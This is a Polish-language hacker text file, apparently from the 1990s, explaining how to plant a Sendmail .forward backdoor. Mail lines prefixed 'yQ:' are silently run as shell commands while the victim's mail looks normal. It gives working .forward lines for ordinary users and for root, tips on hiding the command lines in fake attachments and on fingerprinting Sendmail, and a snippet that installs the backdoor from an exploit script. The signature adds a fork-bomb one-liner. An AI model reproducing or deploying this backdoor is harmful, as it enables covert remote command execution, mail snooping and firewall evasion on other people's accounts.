Pytanie #1: CO?
^^^^^^^^^^^^^^^
Przetestujcie to. Wrzuccie to na jakims Linuxie (nie testowalem na
niczym innym, ale powinno dzialac na wszystkim, co ma Sendmaila)
do katalogu domowego gostka pod nazwa .forward:

"|grep ^yQ|cut -f 2 -d :>_;. _;rm _"
"|grep -v ^yQ>>/var/spool/mail/`whoami`"

Co to za dwie liniki smiecia? Ano to jest potezne. Zrobcie tak -
wyslijcie do kogos, kto ma zainstalowana taka "poprawke" list
nastepujacej postaci:

--
From: ja@superserwer.com
To: on@lamerz.com

blablabla, jak leci, stary?
bo jesli o mnie chodzi to spoko.
yQ:echo KUKU>KUKULKA
u mnie pada snieg.

zawsze twoj,
bigalmer.
--

OK, co dostanie gosciu e-mailem? List wygladajacy tak:

--
From: ja@superserwer.com
To: on@lamerz.com

blablabla, jak leci, stary?
bo jesli o mnie chodzi to spoko.
u mnie pada snieg.

zawsze twoj,
bigalmer.
--

Jakas roznica? Hmm... A gdzie podziala sie linijka yQ...?
Nie przejmujcie sie, zaopiekowal sie nia shell i poslusznie
wykonal to, co mu kazala :)"echo KUKU>KUKULKA". Of koz w
skutek tego na koncie goscia pojawi sie stosowny plik :)

Pytanie #2: PO CO?
^^^^^^^^^^^^^^^^^^
1. Backdoor - dosc ciezki do znalezienia bo root nie
grzebie teoretycznie po kontach "normalnych" userow :)

2. Jesli jakis serw ma zablokowany jakikolwiek dostep
z zewnatrz i nie da sie postawic zadnego telnet bouncera
itd (np. firewall) - uzyskujesz mozliwosc korzystania ze
shella przez jedyny udostepniany port, 25 :))) Mozna tak
wysylac pliki (uuencode), uruchamiac exploity i wszystko inne.

3. Of koz wkurzanie kogos, jesli ktos preferuje takie
rzeczy, grzebanie w koncie, czytanie poczty i ta dali...

Pytanie #3: JAK?
^^^^^^^^^^^^^^^^

"|grep ^yQ|cut -f 2 -d :>_;. _;rm _"

Ta linia wybiera linijki z tekstem 'yQ' z listu, obcina
tekst 'yQ:' a reszte zapisuje do pliku, ktory pozniej
odpala za pomoca shella i kasuje.

"|grep -v ^yQ>>/var/spool/mail/`whoami`"

Ta linia wybiera tylko linie bez yQ i dopisuje je do
mailboxa. Jego nazwe ustala wykonujac polecenie whoami.

Pytanie #4: KIEDY?
^^^^^^^^^^^^^^^^^^
To bylo dla zwyklego usera...
Dla roota trza to poprawic. W wypadku tego goscia
rozwiazanie bedzie nieco inne - oto dwie linijki:

root
"|grep ^yQ|cut -f 2 -d :>/tmp/_;sh /tmp/_;rm /tmp/_"

Z tym, ze wtedy linijki yQ trzeba ukryc w jakiejs
niewidocznej czesci - rzekomo dolaczonym pliku binarnym,
etc.

Jest tez pewne ograniczenie - w poleceniach nie
powinien pojawic sie znak ':'. Jesli jednak
potrzebujemy go uzyc - zawsze mozemy zmodyfikowac
(wysylajac list :) tak plik .forward, zeby zamienic
":" na chocby "?".

Aha, i upewnijcie sie, ze macie do czynienia z
Sendmailem. O ile macie dostep do konta - sprawdzcie,
czy w systemie jest smrsh (grep "smrsh" /etc/sendmail.cf)
- jesli tak to nie da rady, na ogol jednak nie ma (98%).
Niezaleznie od tego sprawdzcie, czy jest tam na serio
Sendmail - zbadajcie banner na porcie 25, wpiszcie "HELP"
i porownajcie z tym, co pokazuje Sendmail. Sprawdzcie
zachowanie sie roznych polecen z prawdziwym SM :)

Pytanie #5: KTOREDY?
^^^^^^^^^^^^^^^^^^^^
Przykladowa poprawka do lewego exploita:

#!/bin/sh
WARD=/.for
[...]
cat >~${WARD}ward <ward
"|grep ^yQ|cut -f 2 -d :>_;. _;rm _"
"|grep -v ^yQ>>/var/spool/mail/`whoami`"
ward
[...]

Pytanie #6: KTO?
^^^^^^^^^^^^^^^^
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 2 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
=--------- [ echo "while [ -f $0 ]; do $0 &; done" >_;. _ ] ----------=
